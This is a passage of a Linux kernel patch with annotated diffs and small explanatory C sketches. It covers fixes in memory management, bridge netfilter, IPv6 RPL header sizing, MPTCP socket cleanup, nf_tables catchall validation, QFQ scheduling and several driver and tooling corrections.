++		if (tmp && vm_end_gap(tmp) > gap) {
++			high_limit = tmp->vm_start;
++			mas_reset(&mas);
++			goto retry;
++		}
++	}
++
+ 	return gap;
+ }
+ 
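
Both search directions in mm/mmap.c gain a retry loop: if the
candidate gap would overlap a stack's guard region (a VM_GROWSDOWN
neighbor), the search limit is tightened and the lookup reruns rather
than handing out an address inside the guard gap. Schematically, with
trivial stand-in helpers:

    #include <errno.h>

    #define NO_GAP ((unsigned long)-1)

    /* first_fit() models mas_empty_area(); a real guard_collision()
     * would detect the clash and raise *low past the offending stack. */
    static unsigned long first_fit(unsigned long low, unsigned long high,
                                   unsigned long len)
    {
        return (high - low >= len) ? low : NO_GAP;
    }

    static int guard_collision(unsigned long gap, unsigned long len,
                               unsigned long *low)
    {
        (void)gap; (void)len; (void)low;
        return 0;
    }

    static unsigned long find_lowest_gap(unsigned long low,
                                         unsigned long high,
                                         unsigned long len)
    {
        unsigned long gap;

    retry:
        gap = first_fit(low, high, len);
        if (gap == NO_GAP)
            return -ENOMEM;
        if (guard_collision(gap, len, &low))
            goto retry; /* window tightened; search again */
        return gap;
    }
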
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index dab67b14e178d..9e4b339809141 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -6590,7 +6590,21 @@ static void __build_all_zonelists(void *data)
+ 	int nid;
+ 	int __maybe_unused cpu;
+ 	pg_data_t *self = data;
++	unsigned long flags;
+ 
++	/*
++	 * Explicitly disable this CPU's interrupts before taking seqlock
++	 * to prevent any IRQ handler from calling into the page allocator
++	 * (e.g. GFP_ATOMIC) that could hit zonelist_iter_begin and livelock.
++	 */
++	local_irq_save(flags);
++	/*
++	 * Explicitly disable this CPU's synchronous printk() before taking
++	 * seqlock to prevent any printk() from trying to hold port->lock, for
++	 * tty_insert_flip_string_and_push_buffer() on other CPU might be
++	 * calling kmalloc(GFP_ATOMIC | __GFP_NOWARN) with port->lock held.
++	 */
++	printk_deferred_enter();
+ 	write_seqlock(&zonelist_update_seq);
+ 
+ #ifdef CONFIG_NUMA
+@@ -6629,6 +6643,8 @@ static void __build_all_zonelists(void *data)
+ 	}
+ 
+ 	write_sequnlock(&zonelist_update_seq);
++	printk_deferred_exit();
++	local_irq_restore(flags);
+ }
+ 
+ static noinline void __init
+@@ -9407,6 +9423,9 @@ static bool pfn_range_valid_contig(struct zone *z, unsigned long start_pfn,
+ 
+ 		if (PageReserved(page))
+ 			return false;
++
++		if (PageHuge(page))
++			return false;
+ 	}
+ 	return true;
+ }
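
The zonelist hunk brackets the seqlock write side with
local_irq_save() and printk_deferred_enter() so that nothing on this
CPU, neither an IRQ-context GFP_ATOMIC allocation nor a synchronous
printk(), can re-enter while the sequence count is odd. As a reusable
kernel-style shape (the seqlock here is hypothetical):

    #include <linux/irqflags.h>
    #include <linux/printk.h>
    #include <linux/seqlock.h>

    static DEFINE_SEQLOCK(example_seq);

    static void update_under_seqlock(void)
    {
        unsigned long flags;

        local_irq_save(flags);      /* no IRQ handler re-entry... */
        printk_deferred_enter();    /* ...no synchronous printk() */
        write_seqlock(&example_seq);

        /* ... modify the data the seqlock protects ... */

        write_sequnlock(&example_seq);
        printk_deferred_exit();
        local_irq_restore(flags);
    }
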
+diff --git a/mm/vmalloc.c b/mm/vmalloc.c
+index b2249d01b3a2c..f6b3c8850d15b 100644
+--- a/mm/vmalloc.c
++++ b/mm/vmalloc.c
+@@ -324,8 +324,8 @@ int ioremap_page_range(unsigned long addr, unsigned long end,
+ 				 ioremap_max_page_shift);
+ 	flush_cache_vmap(addr, end);
+ 	if (!err)
+-		kmsan_ioremap_page_range(addr, end, phys_addr, prot,
+-					 ioremap_max_page_shift);
++		err = kmsan_ioremap_page_range(addr, end, phys_addr, prot,
++					       ioremap_max_page_shift);
+ 	return err;
+ }
+ 
+@@ -616,7 +616,11 @@ int __vmap_pages_range_noflush(unsigned long addr, unsigned long end,
+ int vmap_pages_range_noflush(unsigned long addr, unsigned long end,
+ 		pgprot_t prot, struct page **pages, unsigned int page_shift)
+ {
+-	kmsan_vmap_pages_range_noflush(addr, end, prot, pages, page_shift);
++	int ret = kmsan_vmap_pages_range_noflush(addr, end, prot, pages,
++						 page_shift);
++
++	if (ret)
++		return ret;
+ 	return __vmap_pages_range_noflush(addr, end, prot, pages, page_shift);
+ }
+ 
+diff --git a/net/bridge/br_netfilter_hooks.c b/net/bridge/br_netfilter_hooks.c
+index 9554abcfd5b4e..812bd7e1750b6 100644
+--- a/net/bridge/br_netfilter_hooks.c
++++ b/net/bridge/br_netfilter_hooks.c
+@@ -868,12 +868,17 @@ static unsigned int ip_sabotage_in(void *priv,
+ {
+ 	struct nf_bridge_info *nf_bridge = nf_bridge_info_get(skb);
+ 
+-	if (nf_bridge && !nf_bridge->in_prerouting &&
+-	    !netif_is_l3_master(skb->dev) &&
+-	    !netif_is_l3_slave(skb->dev)) {
+-		nf_bridge_info_free(skb);
+-		state->okfn(state->net, state->sk, skb);
+-		return NF_STOLEN;
++	if (nf_bridge) {
++		if (nf_bridge->sabotage_in_done)
++			return NF_ACCEPT;
++
++		if (!nf_bridge->in_prerouting &&
++		    !netif_is_l3_master(skb->dev) &&
++		    !netif_is_l3_slave(skb->dev)) {
++			nf_bridge->sabotage_in_done = 1;
++			state->okfn(state->net, state->sk, skb);
++			return NF_STOLEN;
++		}
+ 	}
+ 
+ 	return NF_ACCEPT;
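
The bridge fix replaces "free and steal every time" with a one-shot
flag: the first pass through ip_sabotage_in() marks the skb, so when
the re-injected packet traverses the hook again it is accepted rather
than looping forever. The guard in miniature (types and verdict codes
invented):

    #include <stdbool.h>

    enum verdict { ACCEPT, STOLEN };

    struct pkt {
        unsigned int sabotage_in_done:1;    /* models nf_bridge_info */
    };

    static enum verdict sabotage_hook(struct pkt *p, bool needs_reinject)
    {
        if (p->sabotage_in_done)
            return ACCEPT;      /* second pass: let it through */

        if (needs_reinject) {
            p->sabotage_in_done = 1;
            return STOLEN;      /* re-injected; next pass accepts */
        }
        return ACCEPT;
    }
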
+diff --git a/net/bridge/br_switchdev.c b/net/bridge/br_switchdev.c
+index 7eb6fd5bb917a..0b5f8e1a7325d 100644
+--- a/net/bridge/br_switchdev.c
++++ b/net/bridge/br_switchdev.c
+@@ -150,6 +150,17 @@ br_switchdev_fdb_notify(struct net_bridge *br,
+ 	if (test_bit(BR_FDB_LOCKED, &fdb->flags))
+ 		return;
+ 
++	/* Entries with these flags were created using ndm_state == NUD_REACHABLE,
++	 * ndm_flags == NTF_MASTER( | NTF_STICKY), ext_flags == 0 by something
++	 * equivalent to 'bridge fdb add ... master dynamic (sticky)'.
++	 * Drivers don't know how to deal with these, so don't notify them to
++	 * avoid confusing them.
++	 */
++	if (test_bit(BR_FDB_ADDED_BY_USER, &fdb->flags) &&
++	    !test_bit(BR_FDB_STATIC, &fdb->flags) &&
++	    !test_bit(BR_FDB_ADDED_BY_EXT_LEARN, &fdb->flags))
++		return;
++
+ 	br_switchdev_fdb_populate(br, &item, fdb, NULL);
+ 
+ 	switch (type) {
+diff --git a/net/ipv6/rpl.c b/net/ipv6/rpl.c
+index 488aec9e1a74f..d1876f1922255 100644
+--- a/net/ipv6/rpl.c
++++ b/net/ipv6/rpl.c
+@@ -32,7 +32,8 @@ static void *ipv6_rpl_segdata_pos(const struct ipv6_rpl_sr_hdr *hdr, int i)
+ size_t ipv6_rpl_srh_size(unsigned char n, unsigned char cmpri,
+ 			 unsigned char cmpre)
+ {
+-	return (n * IPV6_PFXTAIL_LEN(cmpri)) + IPV6_PFXTAIL_LEN(cmpre);
++	return sizeof(struct ipv6_rpl_sr_hdr) + (n * IPV6_PFXTAIL_LEN(cmpri)) +
++		IPV6_PFXTAIL_LEN(cmpre);
+ }
+ 
+ void ipv6_rpl_srh_decompress(struct ipv6_rpl_sr_hdr *outhdr,
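
The rpl change fixes a classic sizing bug: the buffer was sized from
the variable-length tail alone, so every writer overflowed it by the
size of the fixed header. A worked toy example, assuming a
hypothetical 8-byte header and two 8-byte compressed prefixes plus a
4-byte final one:

    #include <stdio.h>
    #include <stddef.h>

    struct toy_hdr {            /* stands in for struct ipv6_rpl_sr_hdr */
        unsigned char nexthdr, hdrlen, type, segments_left;
        unsigned int flags;     /* 8 bytes total on common ABIs */
    };

    static size_t srh_size(size_t n, size_t tail_i, size_t tail_e)
    {
        /* before the fix: n * tail_i + tail_e (header forgotten) */
        return sizeof(struct toy_hdr) + n * tail_i + tail_e;
    }

    int main(void)
    {
        /* 8 + 2*8 + 4 = 28; the buggy formula gave 20 */
        printf("%zu\n", srh_size(2, 8, 4));
        return 0;
    }
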
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 0fbcb8f4fd651..f20f6664b2ada 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -2316,7 +2316,26 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 			      unsigned int flags)
+ {
+ 	struct mptcp_sock *msk = mptcp_sk(sk);
+-	bool need_push, dispose_it;
++	bool dispose_it, need_push = false;
++
++	/* If the first subflow moved to a close state before accept, e.g. due
++	 * to an incoming reset, mptcp either:
++	 * - if either the subflow or the msk are dead, destroy the context
++	 *   (the subflow socket is deleted by inet_child_forget) and the msk
++	 * - otherwise do nothing at the moment and take action at accept and/or
++	 *   listener shutdown - user-space must be able to accept() the closed
++	 *   socket.
++	 */
++	if (msk->in_accept_queue && msk->first == ssk) {
++		if (!sock_flag(sk, SOCK_DEAD) && !sock_flag(ssk, SOCK_DEAD))
++			return;
++
++		/* ensure later check in mptcp_worker() will dispose the msk */
++		sock_set_flag(sk, SOCK_DEAD);
++		lock_sock_nested(ssk, SINGLE_DEPTH_NESTING);
++		mptcp_subflow_drop_ctx(ssk);
++		goto out_release;
++	}
+ 
+ 	dispose_it = !msk->subflow || ssk != msk->subflow->sk;
+ 	if (dispose_it)
+@@ -2352,28 +2371,22 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 	if (!inet_csk(ssk)->icsk_ulp_ops) {
+ 		WARN_ON_ONCE(!sock_flag(ssk, SOCK_DEAD));
+ 		kfree_rcu(subflow, rcu);
+-	} else if (msk->in_accept_queue && msk->first == ssk) {
+-		/* if the first subflow moved to a close state, e.g. due to
+-		 * incoming reset and we reach here before inet_child_forget()
+-		 * the TCP stack could later try to close it via
+-		 * inet_csk_listen_stop(), or deliver it to the user space via
+-		 * accept().
+-		 * We can't delete the subflow - or risk a double free - nor let
+-		 * the msk survive - or will be leaked in the non accept scenario:
+-		 * fallback and let TCP cope with the subflow cleanup.
+-		 */
+-		WARN_ON_ONCE(sock_flag(ssk, SOCK_DEAD));
+-		mptcp_subflow_drop_ctx(ssk);
+ 	} else {
+ 		/* otherwise tcp will dispose of the ssk and subflow ctx */
+-		if (ssk->sk_state == TCP_LISTEN)
++		if (ssk->sk_state == TCP_LISTEN) {
++			tcp_set_state(ssk, TCP_CLOSE);
++			mptcp_subflow_queue_clean(sk, ssk);
++			inet_csk_listen_stop(ssk);
+ 			mptcp_event_pm_listener(ssk, MPTCP_EVENT_LISTENER_CLOSED);
++		}
+ 
+ 		__tcp_close(ssk, 0);
+ 
+ 		/* close acquired an extra ref */
+ 		__sock_put(ssk);
+ 	}
++
++out_release:
+ 	release_sock(ssk);
+ 
+ 	sock_put(ssk);
+@@ -2428,21 +2441,14 @@ static void __mptcp_close_subflow(struct sock *sk)
+ 		mptcp_close_ssk(sk, ssk, subflow);
+ 	}
+ 
+-	/* if the MPC subflow has been closed before the msk is accepted,
+-	 * msk will never be accept-ed, close it now
+-	 */
+-	if (!msk->first && msk->in_accept_queue) {
+-		sock_set_flag(sk, SOCK_DEAD);
+-		inet_sk_state_store(sk, TCP_CLOSE);
+-	}
+ }
+ 
+-static bool mptcp_check_close_timeout(const struct sock *sk)
++static bool mptcp_should_close(const struct sock *sk)
+ {
+ 	s32 delta = tcp_jiffies32 - inet_csk(sk)->icsk_mtup.probe_timestamp;
+ 	struct mptcp_subflow_context *subflow;
+ 
+-	if (delta >= TCP_TIMEWAIT_LEN)
++	if (delta >= TCP_TIMEWAIT_LEN || mptcp_sk(sk)->in_accept_queue)
+ 		return true;
+ 
+ 	/* if all subflows are in closed status don't bother with additional
+@@ -2650,7 +2656,7 @@ static void mptcp_worker(struct work_struct *work)
+ 	 * even if it is orphaned and in FIN_WAIT2 state
+ 	 */
+ 	if (sock_flag(sk, SOCK_DEAD)) {
+-		if (mptcp_check_close_timeout(sk)) {
++		if (mptcp_should_close(sk)) {
+ 			inet_sk_state_store(sk, TCP_CLOSE);
+ 			mptcp_do_fastclose(sk);
+ 		}
+@@ -2897,6 +2903,14 @@ static void __mptcp_destroy_sock(struct sock *sk)
+ 	sock_put(sk);
+ }
+ 
++void __mptcp_unaccepted_force_close(struct sock *sk)
++{
++	sock_set_flag(sk, SOCK_DEAD);
++	inet_sk_state_store(sk, TCP_CLOSE);
++	mptcp_do_fastclose(sk);
++	__mptcp_destroy_sock(sk);
++}
++
+ static __poll_t mptcp_check_readable(struct mptcp_sock *msk)
+ {
+ 	/* Concurrent splices from sk_receive_queue into receive_queue will
+@@ -3724,6 +3738,18 @@ static int mptcp_stream_accept(struct socket *sock, struct socket *newsock,
+ 			if (!ssk->sk_socket)
+ 				mptcp_sock_graft(ssk, newsock);
+ 		}
++
++		/* Do late cleanup for the first subflow as necessary. Also
++		 * deal with bad peers not doing a complete shutdown.
++		 */
++		if (msk->first &&
++		    unlikely(inet_sk_state_load(msk->first) == TCP_CLOSE)) {
++			__mptcp_close_ssk(newsk, msk->first,
++					  mptcp_subflow_ctx(msk->first), 0);
++			if (unlikely(list_empty(&msk->conn_list)))
++				inet_sk_state_store(newsk, TCP_CLOSE);
++		}
++
+ 		release_sock(newsk);
+ 	}
+ 
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 644cf0686f341..5918cea6a3083 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -629,10 +629,12 @@ void mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 		     struct mptcp_subflow_context *subflow);
+ void __mptcp_subflow_send_ack(struct sock *ssk);
+ void mptcp_subflow_reset(struct sock *ssk);
++void mptcp_subflow_queue_clean(struct sock *sk, struct sock *ssk);
+ void mptcp_sock_graft(struct sock *sk, struct socket *parent);
+ struct socket *__mptcp_nmpc_socket(const struct mptcp_sock *msk);
+ bool __mptcp_close(struct sock *sk, long timeout);
+ void mptcp_cancel_work(struct sock *sk);
++void __mptcp_unaccepted_force_close(struct sock *sk);
+ void mptcp_set_owner_r(struct sk_buff *skb, struct sock *sk);
+ 
+ bool mptcp_addresses_equal(const struct mptcp_addr_info *a,
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index dbc02c2c57ccc..670c880110140 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -722,9 +722,12 @@ void mptcp_subflow_drop_ctx(struct sock *ssk)
+ 	if (!ctx)
+ 		return;
+ 
+-	subflow_ulp_fallback(ssk, ctx);
+-	if (ctx->conn)
+-		sock_put(ctx->conn);
++	list_del(&mptcp_subflow_ctx(ssk)->node);
++	if (inet_csk(ssk)->icsk_ulp_ops) {
++		subflow_ulp_fallback(ssk, ctx);
++		if (ctx->conn)
++			sock_put(ctx->conn);
++	}
+ 
+ 	kfree_rcu(ctx, rcu);
+ }
+@@ -1816,6 +1819,77 @@ static void subflow_state_change(struct sock *sk)
+ 	}
+ }
+ 
++void mptcp_subflow_queue_clean(struct sock *listener_sk, struct sock *listener_ssk)
++{
++	struct request_sock_queue *queue = &inet_csk(listener_ssk)->icsk_accept_queue;
++	struct mptcp_sock *msk, *next, *head = NULL;
++	struct request_sock *req;
++	struct sock *sk;
++
++	/* build a list of all unaccepted mptcp sockets */
++	spin_lock_bh(&queue->rskq_lock);
++	for (req = queue->rskq_accept_head; req; req = req->dl_next) {
++		struct mptcp_subflow_context *subflow;
++		struct sock *ssk = req->sk;
++
++		if (!sk_is_mptcp(ssk))
++			continue;
++
++		subflow = mptcp_subflow_ctx(ssk);
++		if (!subflow || !subflow->conn)
++			continue;
++
++		/* skip if already in list */
++		sk = subflow->conn;
++		msk = mptcp_sk(sk);
++		if (msk->dl_next || msk == head)
++			continue;
++
++		sock_hold(sk);
++		msk->dl_next = head;
++		head = msk;
++	}
++	spin_unlock_bh(&queue->rskq_lock);
++	if (!head)
++		return;
++
++	/* can't acquire the msk socket lock under the subflow one,
++	 * or will cause ABBA deadlock
++	 */
++	release_sock(listener_ssk);
++
++	for (msk = head; msk; msk = next) {
++		sk = (struct sock *)msk;
++
++		lock_sock_nested(sk, SINGLE_DEPTH_NESTING);
++		next = msk->dl_next;
++		msk->dl_next = NULL;
++
++		__mptcp_unaccepted_force_close(sk);
++		release_sock(sk);
++
++		/* lockdep will report a false positive ABBA deadlock
++		 * between cancel_work_sync and the listener socket.
++		 * The involved locks belong to different sockets WRT
++		 * the existing AB chain.
++		 * Using a per socket key is problematic as key
++		 * deregistration requires process context and must be
++		 * performed at socket disposal time, in atomic
++		 * context.
++		 * Just tell lockdep to consider the listener socket
++		 * released here.
++		 */
++		mutex_release(&listener_sk->sk_lock.dep_map, _RET_IP_);
++		mptcp_cancel_work(sk);
++		mutex_acquire(&listener_sk->sk_lock.dep_map, 0, 0, _RET_IP_);
++
++		sock_put(sk);
++	}
++
++	/* we are still under the listener msk socket lock */
++	lock_sock_nested(listener_ssk, SINGLE_DEPTH_NESTING);
++}
++
+ static int subflow_ulp_init(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 6023c9f72cdca..ce8a047ef8306 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -3439,6 +3439,64 @@ static int nft_table_validate(struct net *net, const struct nft_table *table)
+ 	return 0;
+ }
+ 
++int nft_setelem_validate(const struct nft_ctx *ctx, struct nft_set *set,
++			 const struct nft_set_iter *iter,
++			 struct nft_set_elem *elem)
++{
++	const struct nft_set_ext *ext = nft_set_elem_ext(set, elem->priv);
++	struct nft_ctx *pctx = (struct nft_ctx *)ctx;
++	const struct nft_data *data;
++	int err;
++
++	if (nft_set_ext_exists(ext, NFT_SET_EXT_FLAGS) &&
++	    *nft_set_ext_flags(ext) & NFT_SET_ELEM_INTERVAL_END)
++		return 0;
++
++	data = nft_set_ext_data(ext);
++	switch (data->verdict.code) {
++	case NFT_JUMP:
++	case NFT_GOTO:
++		pctx->level++;
++		err = nft_chain_validate(ctx, data->verdict.chain);
++		if (err < 0)
++			return err;
++		pctx->level--;
++		break;
++	default:
++		break;
++	}
++
++	return 0;
++}
++
++struct nft_set_elem_catchall {
++	struct list_head	list;
++	struct rcu_head		rcu;
++	void			*elem;
++};
++
++int nft_set_catchall_validate(const struct nft_ctx *ctx, struct nft_set *set)
++{
++	u8 genmask = nft_genmask_next(ctx->net);
++	struct nft_set_elem_catchall *catchall;
++	struct nft_set_elem elem;
++	struct nft_set_ext *ext;
++	int ret = 0;
++
++	list_for_each_entry_rcu(catchall, &set->catchall_list, list) {
++		ext = nft_set_elem_ext(set, catchall->elem);
++		if (!nft_set_elem_active(ext, genmask))
++			continue;
++
++		elem.priv = catchall->elem;
++		ret = nft_setelem_validate(ctx, set, NULL, &elem);
++		if (ret < 0)
++			return ret;
++	}
++
++	return ret;
++}
++
+ static struct nft_rule *nft_rule_lookup_byid(const struct net *net,
+ 					     const struct nft_chain *chain,
+ 					     const struct nlattr *nla);
+@@ -4743,12 +4801,6 @@ err_set_name:
+ 	return err;
+ }
+ 
+-struct nft_set_elem_catchall {
+-	struct list_head	list;
+-	struct rcu_head		rcu;
+-	void			*elem;
+-};
+-
+ static void nft_set_catchall_destroy(const struct nft_ctx *ctx,
+ 				     struct nft_set *set)
+ {
+@@ -6036,7 +6088,8 @@ static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
+ 	if (err < 0)
+ 		return err;
+ 
+-	if (!nla[NFTA_SET_ELEM_KEY] && !(flags & NFT_SET_ELEM_CATCHALL))
++	if (((flags & NFT_SET_ELEM_CATCHALL) && nla[NFTA_SET_ELEM_KEY]) ||
++	    (!(flags & NFT_SET_ELEM_CATCHALL) && !nla[NFTA_SET_ELEM_KEY]))
+ 		return -EINVAL;
+ 
+ 	if (flags != 0) {
+@@ -7028,7 +7081,7 @@ static int nf_tables_newobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 	}
+ 
+ 	if (nla[NFTA_OBJ_USERDATA]) {
+-		obj->udata = nla_memdup(nla[NFTA_OBJ_USERDATA], GFP_KERNEL);
++		obj->udata = nla_memdup(nla[NFTA_OBJ_USERDATA], GFP_KERNEL_ACCOUNT);
+ 		if (obj->udata == NULL)
+ 			goto err_userdata;
+ 
+diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
+index cae5a67241634..cecf8ab90e58f 100644
+--- a/net/netfilter/nft_lookup.c
++++ b/net/netfilter/nft_lookup.c
+@@ -199,37 +199,6 @@ nla_put_failure:
+ 	return -1;
+ }
+ 
+-static int nft_lookup_validate_setelem(const struct nft_ctx *ctx,
+-				       struct nft_set *set,
+-				       const struct nft_set_iter *iter,
+-				       struct nft_set_elem *elem)
+-{
+-	const struct nft_set_ext *ext = nft_set_elem_ext(set, elem->priv);
+-	struct nft_ctx *pctx = (struct nft_ctx *)ctx;
+-	const struct nft_data *data;
+-	int err;
+-
+-	if (nft_set_ext_exists(ext, NFT_SET_EXT_FLAGS) &&
+-	    *nft_set_ext_flags(ext) & NFT_SET_ELEM_INTERVAL_END)
+-		return 0;
+-
+-	data = nft_set_ext_data(ext);
+-	switch (data->verdict.code) {
+-	case NFT_JUMP:
+-	case NFT_GOTO:
+-		pctx->level++;
+-		err = nft_chain_validate(ctx, data->verdict.chain);
+-		if (err < 0)
+-			return err;
+-		pctx->level--;
+-		break;
+-	default:
+-		break;
+-	}
+-
+-	return 0;
+-}
+-
+ static int nft_lookup_validate(const struct nft_ctx *ctx,
+ 			       const struct nft_expr *expr,
+ 			       const struct nft_data **d)
+@@ -245,9 +214,12 @@ static int nft_lookup_validate(const struct nft_ctx *ctx,
+ 	iter.skip	= 0;
+ 	iter.count	= 0;
+ 	iter.err	= 0;
+-	iter.fn		= nft_lookup_validate_setelem;
++	iter.fn		= nft_setelem_validate;
+ 
+ 	priv->set->ops->walk(ctx, priv->set, &iter);
++	if (!iter.err)
++		iter.err = nft_set_catchall_validate(ctx, priv->set);
++
+ 	if (iter.err < 0)
+ 		return iter.err;
+ 
+diff --git a/net/sched/sch_qfq.c b/net/sched/sch_qfq.c
+index cf5ebe43b3b4e..02098a02943eb 100644
+--- a/net/sched/sch_qfq.c
++++ b/net/sched/sch_qfq.c
+@@ -421,15 +421,16 @@ static int qfq_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
+ 	} else
+ 		weight = 1;
+ 
+-	if (tb[TCA_QFQ_LMAX]) {
++	if (tb[TCA_QFQ_LMAX])
+ 		lmax = nla_get_u32(tb[TCA_QFQ_LMAX]);
+-		if (lmax < QFQ_MIN_LMAX || lmax > (1UL << QFQ_MTU_SHIFT)) {
+-			pr_notice("qfq: invalid max length %u\n", lmax);
+-			return -EINVAL;
+-		}
+-	} else
++	else
+ 		lmax = psched_mtu(qdisc_dev(sch));
+ 
++	if (lmax < QFQ_MIN_LMAX || lmax > (1UL << QFQ_MTU_SHIFT)) {
++		pr_notice("qfq: invalid max length %u\n", lmax);
++		return -EINVAL;
++	}
++
+ 	inv_w = ONE_FP / weight;
+ 	weight = ONE_FP / inv_w;
+ 
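
The qfq refactor hoists the range check out of the if/else so the
default lmax (the device's psched_mtu()) is validated exactly like a
user-supplied one; previously a jumbo-MTU device could slip an
out-of-range default past the check. The shape of the fix, with
placeholder bounds:

    #include <errno.h>
    #include <stdbool.h>

    #define MIN_LMAX 512        /* placeholder bounds, not QFQ's */
    #define MAX_LMAX (1u << 21)

    static int pick_lmax(bool user_set, unsigned int user_val,
                         unsigned int dev_mtu, unsigned int *lmax)
    {
        unsigned int v = user_set ? user_val : dev_mtu;

        /* one check now covers both sources of the value */
        if (v < MIN_LMAX || v > MAX_LMAX)
            return -EINVAL;
        *lmax = v;
        return 0;
    }
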
+diff --git a/rust/kernel/print.rs b/rust/kernel/print.rs
+index 30103325696d8..8009184bf6d76 100644
+--- a/rust/kernel/print.rs
++++ b/rust/kernel/print.rs
+@@ -18,7 +18,11 @@ use crate::bindings;
+ 
+ // Called from `vsprintf` with format specifier `%pA`.
+ #[no_mangle]
+-unsafe fn rust_fmt_argument(buf: *mut c_char, end: *mut c_char, ptr: *const c_void) -> *mut c_char {
++unsafe extern "C" fn rust_fmt_argument(
++    buf: *mut c_char,
++    end: *mut c_char,
++    ptr: *const c_void,
++) -> *mut c_char {
+     use fmt::Write;
+     // SAFETY: The C contract guarantees that `buf` is valid if it's less than `end`.
+     let mut w = unsafe { RawFormatter::from_ptrs(buf.cast(), end.cast()) };
+diff --git a/rust/kernel/str.rs b/rust/kernel/str.rs
+index b771310fa4a49..cd3d2a6cf1fc1 100644
+--- a/rust/kernel/str.rs
++++ b/rust/kernel/str.rs
+@@ -408,7 +408,7 @@ impl RawFormatter {
+     /// If `pos` is less than `end`, then the region between `pos` (inclusive) and `end`
+     /// (exclusive) must be valid for writes for the lifetime of the returned [`RawFormatter`].
+     pub(crate) unsafe fn from_ptrs(pos: *mut u8, end: *mut u8) -> Self {
+-        // INVARIANT: The safety requierments guarantee the type invariants.
++        // INVARIANT: The safety requirements guarantee the type invariants.
+         Self {
+             beg: pos as _,
+             pos: pos as _,
+diff --git a/scripts/asn1_compiler.c b/scripts/asn1_compiler.c
+index 71d4a7c879008..c3e501451b41d 100644
+--- a/scripts/asn1_compiler.c
++++ b/scripts/asn1_compiler.c
+@@ -625,7 +625,7 @@ int main(int argc, char **argv)
+ 	p = strrchr(argv[1], '/');
+ 	p = p ? p + 1 : argv[1];
+ 	grammar_name = strdup(p);
+-	if (!p) {
++	if (!grammar_name) {
+ 		perror(NULL);
+ 		exit(1);
+ 	}
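
The asn1_compiler one-liner fixes a misplaced NULL check: strdup()'s
result went into grammar_name, but the test reread p, which was
already known to be non-NULL. The corrected idiom in isolation:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    static char *dup_or_die(const char *p)
    {
        char *name = strdup(p);

        if (!name) {    /* test the allocation, not the argument */
            perror(NULL);
            exit(1);
        }
        return name;
    }
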
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 6a6c72b5ea26d..f70d6a33421d2 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9468,6 +9468,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b47, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b65, "HP ProBook 455 15.6 inch G10 Notebook PC", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b66, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+diff --git a/sound/soc/fsl/fsl_asrc_dma.c b/sound/soc/fsl/fsl_asrc_dma.c
+index 3b81a465814a1..05a7d1588d204 100644
+--- a/sound/soc/fsl/fsl_asrc_dma.c
++++ b/sound/soc/fsl/fsl_asrc_dma.c
+@@ -209,14 +209,19 @@ static int fsl_asrc_dma_hw_params(struct snd_soc_component *component,
+ 		be_chan = soc_component_to_pcm(component_be)->chan[substream->stream];
+ 		tmp_chan = be_chan;
+ 	}
+-	if (!tmp_chan)
+-		tmp_chan = dma_request_slave_channel(dev_be, tx ? "tx" : "rx");
++	if (!tmp_chan) {
++		tmp_chan = dma_request_chan(dev_be, tx ? "tx" : "rx");
++		if (IS_ERR(tmp_chan)) {
++			dev_err(dev, "failed to request DMA channel for Back-End\n");
++			return -EINVAL;
++		}
++	}
+ 
+ 	/*
+ 	 * An EDMA DEV_TO_DEV channel is fixed and bound with DMA event of each
+ 	 * peripheral, unlike SDMA channel that is allocated dynamically. So no
+ 	 * need to configure dma_request and dma_request2, but get dma_chan of
+-	 * Back-End device directly via dma_request_slave_channel.
++	 * Back-End device directly via dma_request_chan.
+ 	 */
+ 	if (!asrc->use_edma) {
+ 		/* Get DMA request of Back-End */
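
The ASoC hunk also encodes an API difference worth remembering: the
deprecated dma_request_slave_channel() returned NULL on failure, while
dma_request_chan() returns an ERR_PTR() that must be tested with
IS_ERR(). A kernel-style sketch of the call site:

    #include <linux/device.h>
    #include <linux/dmaengine.h>
    #include <linux/err.h>

    static int request_tx_chan(struct device *dev, struct dma_chan **out)
    {
        struct dma_chan *chan = dma_request_chan(dev, "tx");

        if (IS_ERR(chan)) {     /* a NULL check would miss this */
            dev_err(dev, "no tx channel: %pe\n", chan);
            return PTR_ERR(chan);
        }
        *out = chan;
        return 0;
    }
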
